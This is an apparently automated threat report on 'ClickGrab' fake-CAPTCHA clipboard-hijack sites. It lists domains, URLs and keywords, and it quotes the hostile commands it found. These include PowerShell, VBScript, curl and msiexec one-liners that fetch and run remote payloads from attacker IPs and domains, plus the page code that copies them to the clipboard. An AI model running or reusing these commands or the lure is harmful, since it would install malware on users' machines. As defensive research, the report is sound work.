
Emerging ClickGrab Campaign: Advanced Analysis of 2026-05-16 Attack Patterns

100 Sites
22% Detection
2 PS Downloads

ClickGrab Threat Analysis Report - 2026-05-16

Generated on 2026-05-16 01:52:58

Executive Summary

  • Total sites analyzed: 100
  • Sites with malicious content: 22
  • Unique domains encountered: 2,053
  • Total URLs extracted: 8,587
  • PowerShell download attempts: 2
  • Clipboard manipulation instances: 100

Domain Analysis

Most Frequently Encountered Domains

  • bharatnamkeens.com: 405 occurrences
  • baovechuyennghiep.baovengayvadem.com: 348 occurrences
  • www.maheshwaree.com: 320 occurrences
  • 98.70.13.131: 309 occurrences
  • fudgeshop.com.au: 265 occurrences
  • picsera.com: 226 occurrences
  • 18.176.47.246: 218 occurrences
  • adturekorea.co.kr: 214 occurrences
  • scillarodriguez.com: 199 occurrences
  • www.ccera-icar.org: 178 occurrences
  • www.evodigital.com.au: 156 occurrences
  • www.creatorssky.com: 156 occurrences
  • devblog.ezeelogin.com: 126 occurrences
  • www.dorper.com.au: 125 occurrences
  • picsera.sirv.com: 121 occurrences

URL Pattern Analysis

reCAPTCHA imagery

11 occurrences across 8 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
  • https://www.google.com/recaptcha/api.js (2 times)
  • https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
  • https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (1 time)
  • https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm (1 time)
  • ...and 3 more distinct URLs

Font resources

72 occurrences across 60 distinct URLs

  • https://fonts.gstatic.com (5 times)
  • https://fonts.googleapis.com (3 times)
  • https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0 (2 times)
  • https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620 (2 times)
  • https://use.fontawesome.com/releases/v5.6.3/css/all.css (2 times)
  • ...and 55 more distinct URLs

CDN hosted scripts

10 occurrences across 10 distinct URLs

  • https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js (1 time)
  • https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/ (1 time)
  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 time)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=6.8.5 (1 time)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js?ver=6.0.8 (1 time)
  • ...and 5 more distinct URLs

Google resources

134 occurrences across 75 distinct URLs

  • https://bharatnamkeens.com/wp-content/plugins/widget-google-reviews/assets/img/guest.png (32 times)
  • https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (13 times)
  • https://www.googletagmanager.com/gtm.js?id= (4 times)
  • https://fonts.googleapis.com (3 times)
  • https://www.google (3 times)
  • ...and 70 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 529 (113 unique)

Keyword Categories

Social Engineering

46 unique keywords

  • captcha-js
  • exec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
  • CAPTCHA
  • robot
  • captcha_word_new_402692
  • CAPTCHA-logo
  • Verification
  • Verification ID
  • command = "msiexec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
  • exec /i https://i-like-ele-phants-verification.live/iamchallenge/verification/UserID7383526;`
  • ...and 36 more

Obfuscation Indicators

11 unique keywords

  • eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")
  • eval(
  • eval("clearTimeout(timeIn"+uid+")")
  • eval("clearTimeout(timeOut"+uid+")")
  • eval(script)
  • eval('var timeOut'+popupItems[i].id)
  • eval(frameContents)
  • eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")
  • eval(this._loadScript(url.url) + "\n//@ sourceURL= " + url.url)
  • ...and 1 more

System Commands

33 unique keywords

  • exec(
  • const command =
  • command =powershell -c "Invoke-WebRequest -Uri 'http://95.164.53.214:5554/d.bat' -OutFile \"%temp%\d.bat\" -UseBasicParsing; Start-Process \"%temp%\d.bat\"";
  • exec /i http://inkbookwriters.com/verify';
  • command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://198.13.158.127:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
  • cmd.exe /c powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;";`
  • cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://198.13.158.127:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
  • exec(url))
  • command = 'msiexec /i http://inkbookwriters.com/verify /qn';
  • ...and 23 more

Verification Text

3 unique keywords

  • ray id
  • Hidden
  • hidden

Technical Terms

20 unique keywords

  • ResponseText
  • responseText
  • ieX
  • WebClient
  • failed_to_retrieve
  • XMLHTTP
  • bypass
  • .exe
  • Ray ID
  • Bypass
  • ...and 10 more

Most Frequent Keywords

  • hidden: 47 occurrences
  • robot: 39 occurrences
  • Robot: 29 occurrences
  • verification: 20 occurrences
  • CAPTCHA: 18 occurrences
  • Verification: 17 occurrences
  • failed_to_retrieve: 17 occurrences
  • CAPTCHA Verification: 16 occurrences
  • I am not a robot: 16 occurrences
  • You will observe: 16 occurrences
  • verification-id: 16 occurrences
  • To better prove you are not a robot: 16 occurrences
  • Verification ID: 15 occurrences
  • Ray ID: 14 occurrences
  • Checking if you are human: 14 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

Group 2: CAPTCHA Verification, CAPTCHA-verificatie-ID, Verification, verification

Group 3: Verification ID, verification-id, verification_data, verification id, Verification Hash, verification_id

Group 4: Ray ID, ray id

Group 5: CAPTCHA, captcha, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, captcha-js, captcha_0, Captcha

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • ComponentsUnregistering
  • RemoteHostClosedError
  • 071e7611c43a0d999154c463167f066d
  • identifiersUnregistering
  • CREATEVROOTSCreating

Clipboard Manipulation Analysis

Detected clipboard manipulation in 100 instances.

document.execCommand Copy

Found in 42 snippets (42.0% of clipboard code)

Examples:

document.execCommand('copy')
try { document.execCommand('copy')
document.execCommand("copy")

Textarea Manipulation

Found in 45 snippets (45.0% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
tListener("click", function () { const textarea = document.createElement('textarea'
ng is the safe placeholder above const textarea = document.createElement('textarea'

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy) {
    const tempTextArea = document.createElement("textarea");
    tempTextArea.value = textToCopy;
    document.body.append(tempTextArea);
    tempTextArea.select();
    document.execCommand("copy");
    document.body.removeChild(tempTextArea);
}

Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.